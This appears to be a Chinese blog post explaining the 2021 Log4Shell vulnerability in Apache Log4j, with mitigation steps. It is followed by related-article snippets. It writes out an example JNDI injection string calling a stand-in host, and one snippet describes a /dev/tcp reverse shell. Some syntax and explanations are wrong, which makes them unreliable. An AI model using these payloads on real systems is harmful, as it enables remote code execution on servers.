Apache log4j核弹级漏洞,一篇完全理解漏洞原因

最新推荐文章于 2024-04-16 07:48:07 发布
最新推荐文章于 2024-04-16 07:48:07 发布
阅读量4.4k 收藏 6
点赞数
文章标签: apache 安全 java log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29279641/article/details/121951845
版权

2021年12月9日,Log4j组件发生了核弹级别的安全漏洞。作为Java语言程序最普遍使用的组件之一,该次漏洞影响覆盖面之广堪比核弹爆炸;漏洞影响力的大小,从被大家戏称为Log4Shell就可以看出危害之大!

相信圈内的人基本都听到了该消息,也和我一样想弄清楚漏洞究竟是怎么发生的?漏洞的影响范围?能带来什么危害?漏洞的原理是什么?

12月10日,Apache官方也是披露了漏洞的相关详细信息。带着疑问了解了相关信息,分享给大家。

一、漏洞的影响范围?

程序中使用了Apache Log4j 2.x <= 2.14.1 版本,或使用的组件中依赖了该范围版本的log4j,就会收到影响!

二、漏洞产生的原因?

此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。说到这可能还是不太理解,后面会详细说明。

三、能带来什么危害?

此次漏洞的出现,让log4j被戏称为log4Shell。危害就是理论上可以如同shell工具一般,远程在服务器上执行所有的命令!这岂不是起飞?

四、漏洞的原理?

终于到我最关心的漏洞原理部分了。

Log4J提供了支持Java的Lookup功能,可能很多人都不太了解lookup。没关系,只需要支持到lookup可以通过{$xx}的方式来执行一些命令和操作就行。log4j支持在日志中使用该表达式执行命令。下面是log4j使用lookup的简单示例,可以打印系统os信息。

public void test() {
        log.info("{$java:os}");
}

相必看到上面大家对lookup的功能已有所了解。接下来需要配合JNDI,就可以实现对使用log4j的服务进行攻击了。看到这里又不明白了,JNDI是什么?ok,不重要!知道它的作用就行。

举个例子,平时我们在工作中,希望在服务器执行某个本地接口的功能,此时可以使用在本地机器中执行命令:jndi:rmi:https://xx.xx.com/remote/operate。即可以在服务器上执行该接口的代码逻辑,例如操作文件、数据库增删改查等等操作!

则log4j漏洞同理,攻击者需要通过接口请求让服务的日志中打印如下代码:

public void test() {
        log.info("{$jndi:rmi:https://xx.xx.com/remote/operate}");
}

即可完成在服务器上执行操作文件、数据库增删改查等等操作!

还是不太懂可以看下图:
在这里插入图片描述

攻击者定义一个接口,在接口中定义数据库操作等。
攻击者携带lookup支持表达式进行请求服务器。
服务器通过log4j打印出请求信息。
log4j打印完成后会执行JNDI操作。
这样就解释了漏洞的产生,极其高危!

五、解决方案?

综上所述:关闭lookup或者jndi功能就可以解决,也可以直接升级最新版本。

通过设置系统属性 log4j2.formatMsgNoLookups,或者环境变量 LOG4J_FORMAT_MSG_NO_LOOKUPS 为 true 来禁用 lookup 行为。
Apache官方也进行了紧急的修复,升级官方修复版本即可。
了解更多Java知识和热点技术,学习分布式系统,面试经历等,可以关注我的公众号Java码农杂谈哦~

Java码农杂谈
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Java最全log4j2核弹漏洞原理和分析,3年Java开发工程师面试经验分享
2301_79099416的博客
05-10 1004
光给面试题不给答案不是我的风格。这里面的面试题也只是凤毛麟角,还有答案的话会极大的,减少文章的可读性。
深入分析Log4j 漏洞
热门推荐
嘉禾笔记
12-16 1万+
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。 Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。 2021.12.7,Log4j首次被发现了一个非常严重的漏洞,在当天Log4j就发布了log4j-2.15.0-rc1,但是12.
分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,2024年最新网络安全性能优化最佳实践
最新发布
2401_83739777的博客
04-16 1222
Log4jApache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;Apache Log4j2是 Log4j的升版本,据分析,该漏洞产生的原因在于Log4j在记录日志的过程中会对日志内容进行判断,如果内容中包含了${,则Log4j会认为此字符属于可替换的变量,并且Log4j支持JNDI远程加载的方式替换变量值。
log4j2核弹漏洞原理和分析,2024年最新招银网络科技 面经
rdytfuygiohi的博客
04-09 677
Java架构进阶面试及知识点文档笔记这份文档共498页,其中包括Java集合,并发编程,JVM,Dubbo,Redis,Spring全家桶,MySQL,Kafka等面试解析及知识点整理Java分布式高面试问题解析文档其中都是包括分布式的面试问题解析,内容有分布式消息队列,Redis缓存,分库分表,微服务架构,分布式高可用,读写分离等等!互联网Java程序员面试必备问题解析及文档学习笔记Java架构进阶视频解析合集一个人可以走的很快,但一群人才能走的更远。
Log4Shell是什么?从Log4j漏洞说起
Trinity_Techologies的博客
01-04 4251
在开源Apache日志记录库Log4j中已发现了一个影响使用Java的设备和应用程序的新漏洞。该漏洞被称为Log4Shell,是目前互联网上最重大的安全漏洞,其严重程度为10分(满分10分),其影响有愈演愈烈之势。幸运的是,Perforce静态分析和SAST工具——Helix QAC和Klocwork——可以提供帮助。 在这里,我们将解释Log4j漏洞是什么,提供一个Log4j示例,并解释像Klocwork这样的SAST工具如何帮助预防和检测如Log4Shell这样的漏洞
Log4j漏洞原理及修复
o0way0o的博客
01-01 1919
*JNDI(Java Naming and Directory Interface–Java)**命名和目录接口 是Java中为命名和目录服务提供接口的API,通过名字可知道,JNDI主要由两部分组成:Naming(命名)和Directory(目录),其中Naming是指将对象通过唯一标识符绑定到一个上下文Context,同时可通过唯一标识符查找获得对象,而Directory主要指将某一对象的属性绑定到Directory的上下文DirContext中,同时可通过名字获取对象的属性同时操作属性。
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
weixin_44047654的博客
12-12 717
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 是一个广泛使用的Java日志框架,它为开发者提供了强大的日志记录功能。然而,在2021年12月初,一个严重的安全漏洞(CVE-2021-44228)被公开,这个漏洞被称为"Log4Shell",允许攻击者通过注入恶意的...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用程序记录各种运行时信息,包括错误、警告和其他诊断数据。然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell)...
[ 新出漏洞篇 ] 核弹漏洞 Log4j2 RCE 漏洞爆出,开发圈苦逼,安全圈过年,你赶上了吗 ?(外行都能看懂的漏洞分析)
qq_51577576的博客
12-16 4961
Log4j2相信大家不陌生了~~~哈哈哈哈。 相信大家已经被 Log4j2 的重大漏洞刷屏了。几乎没有互联网公司幸免。 估计有不少开发的小伙伴在此前为了修 bug 已经累趴下了。 估计也有不少安全圈的大佬靠着这个漏洞买房买车了~~~ 你~~~赶上了吗? 每每出现这种重大漏洞,开发岗的大佬们---苦逼,安全岗的大佬们---过年。哈哈哈哈 今天勒,我们就来聊一下 Log4j2 到底是个什么鬼 ? Log4j远程代码执行漏洞详解 中华人民共和国网络安全法 第二十七条 任何个人和.
log4j2漏洞原理详解、漏洞复现及漏洞利用
Cwillchris的博客
03-13 1353
虽然/dev/tcp/${HOST}/${PORT}这个字符虽然看起来像一个文件系统中的文件,并且位于/dev这个设备文件夹下,但是这个文件并不存在,并且不是一个设备文件。这只是 bash 实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入 host port 参数,就能发起一个 socket 连接。这两组重定向,将输入,输出,报错信息都输入到/dev/tcp/192.168.1.3/6666 这里了,就相当于把整个 shell 会话,都重定向到 tcp 连接中了。
Apache Log4j 漏洞说明】
Zjx91919191的博客
12-14 3335
关于log4j2的简要说明
Apache Log4j漏洞
江湖事,技术了
12-14 1158
Apache Log4j漏洞 原因 阿里云安全团队发现,Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 Apache 官方发布漏洞 https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues 影响范围 Spring-Boot-strater-log4j2 Apache Struts2 Apache Solr Ap
环境搭建+复现CVE-2021-44228 Apache Log4j 远程代码执行漏洞+原理解析
baidu_25106003的博客
12-14 2663
复现 https://blog.csdn.net/qq_40989258/article/details/121862363 原理解析: https://www.zhihu.com/question/505025655/answer/2265606581
Log4j漏洞复现及原理(附github源码)
weixin_42478399的博客
02-15 5590
1.背景 之前在公司收到Log4j2爆出一个重大漏洞,公司有大部分应用使用到了Log4j的2.14.0以下的版本,全公司内部程序员收到消息之后,加班加点升Log4j的版本到2.14.1(这个版本也不稳定),在此记录一下。 2.Log4j的重大漏洞 我们复现一下Log4j 2.14.0版本中出现的安全问题。首先,我们新建一个Maven项目,引入Log4j的jar包 <?xml version="1.0" encoding="UTF-8"?> <project xmlns="htt
apache log4j2漏洞
01-13
Apache Log4j2是一个流行的Java日志框架,用于记录应用程序的日志信息。然而,最近发现了一个严重的漏洞,被称为Apache Log4j2远程代码执行漏洞。该漏洞允许攻击者通过精心构造的日志消息触发远程代码执行,从而完全控制受影响的应用程序。 攻击者可以通过在日志消息中插入恶意的Java代码来利用此漏洞。当应用程序使用Log4j2来记录这些恶意的日志消息时,Log4j2会尝试解析并执行其中的代码,从而导致远程代码执行。 这个漏洞的危害非常严重,因为它可以被远程利用,而且攻击者可以完全控制受影响的应用程序。攻击者可以执行任意的系统命令、访问敏感数据、篡改应用程序的行为等。 目前,Apache Log4j2的开发团队已经发布了修复此漏洞的补丁,并建议所有受影响的用户尽快升到最新版本。此外,还可以通过配置Log4j2的安全策略来限制日志消息的解析和执行,以减轻此漏洞的风险。 如果你想了解更多关于Apache Log4j2远程代码执行漏洞的详细信息,可以参考引用和引用中提供的文章。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Java码农杂谈

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值